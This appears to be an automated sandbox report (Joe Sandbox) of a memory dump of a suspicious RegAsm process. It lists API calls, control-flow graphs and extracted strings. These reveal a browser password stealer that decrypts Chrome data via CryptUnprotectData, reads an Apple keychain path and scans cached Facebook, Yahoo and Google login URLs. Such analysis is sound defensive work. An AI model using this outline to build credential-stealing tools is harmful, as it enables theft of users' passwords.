                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                • String ID:
                                                • API String ID: 1945712969-0
                                                • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FileFind$FirstNext
                                                • String ID:
                                                • API String ID: 1690352074-0
                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                APIs
                                                • memset.MSVCRT ref: 0041898C
                                                • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: InfoSystemmemset
                                                • String ID:
                                                • API String ID: 3558857096-0
                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 004455C2
                                                • wcsrchr.MSVCRT ref: 004455DA
                                                • memset.MSVCRT ref: 0044570D
                                                • memset.MSVCRT ref: 00445725
                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                • memset.MSVCRT ref: 0044573D
                                                • memset.MSVCRT ref: 00445755
                                                • memset.MSVCRT ref: 004458CB
                                                • memset.MSVCRT ref: 004458E3
                                                • memset.MSVCRT ref: 0044596E
                                                • memset.MSVCRT ref: 00445A10
                                                • memset.MSVCRT ref: 00445A28
                                                • memset.MSVCRT ref: 00445AC6
                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                • memset.MSVCRT ref: 00445B52
                                                • memset.MSVCRT ref: 00445B6A
                                                • memset.MSVCRT ref: 00445C9B
                                                • memset.MSVCRT ref: 00445CB3
                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                • memset.MSVCRT ref: 00445B82
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                • memset.MSVCRT ref: 00445986
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                • API String ID: 2334598624-3798722523
                                                • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                • String ID: $/deleteregkey$/savelangfile
                                                • API String ID: 1442760552-28296030
                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 0040B71C
                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                • wcsrchr.MSVCRT ref: 0040B738
                                                • memset.MSVCRT ref: 0040B756
                                                • memset.MSVCRT ref: 0040B7F5
                                                • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                • memset.MSVCRT ref: 0040B851
                                                • memset.MSVCRT ref: 0040B8CA
                                                • memcmp.MSVCRT ref: 0040B9BF
                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                • memset.MSVCRT ref: 0040BB53
                                                • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                • String ID: chp$v10
                                                • API String ID: 229402216-2783969131
                                                • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                • memset.MSVCRT ref: 00413D7F
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                • memset.MSVCRT ref: 00413E07
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                • free.MSVCRT ref: 00413EC1
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                • API String ID: 3957639419-1740548384
                                                • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                  • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                  • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                • String ID: bhv
                                                • API String ID: 4234240956-2689659898
                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                Control-flow Graph

                                                control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                APIs
                                                • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                • __set_app_type.MSVCRT ref: 00446762
                                                • __p__fmode.MSVCRT ref: 00446777
                                                • __p__commode.MSVCRT ref: 00446785
                                                • __setusermatherr.MSVCRT ref: 004467B1
                                                • _initterm.MSVCRT ref: 004467C7
                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                • _initterm.MSVCRT ref: 004467FD
                                                • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                • exit.MSVCRT ref: 00446897
                                                • _cexit.MSVCRT ref: 0044689D
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                • String ID:
                                                • API String ID: 2791496988-0
                                                • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 0040C298
                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                • wcschr.MSVCRT ref: 0040C324
                                                • wcschr.MSVCRT ref: 0040C344
                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                • GetLastError.KERNEL32 ref: 0040C373
                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                • String ID: visited:
                                                • API String ID: 2470578098-1702587658
                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                Control-flow Graph

                                                control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 free 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                APIs
                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                • memset.MSVCRT ref: 0040E1BD
                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                • free.MSVCRT ref: 0040E28B
                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                • _snwprintf.MSVCRT ref: 0040E257
                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                • API String ID: 2804212203-2982631422
                                                • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                  • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                • memset.MSVCRT ref: 0040BC75
                                                • memset.MSVCRT ref: 0040BC8C
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                • memcmp.MSVCRT ref: 0040BCD6
                                                • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                • String ID:
                                                • API String ID: 115830560-3916222277
                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                • String ID: r!A
                                                • API String ID: 2791114272-628097481
                                                • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                • _wcslwr.MSVCRT ref: 0040C817
                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                • wcslen.MSVCRT ref: 0040C82C
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                • API String ID: 2936932814-4196376884
                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                Control-flow Graph

                                                control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                Memory Dump Source
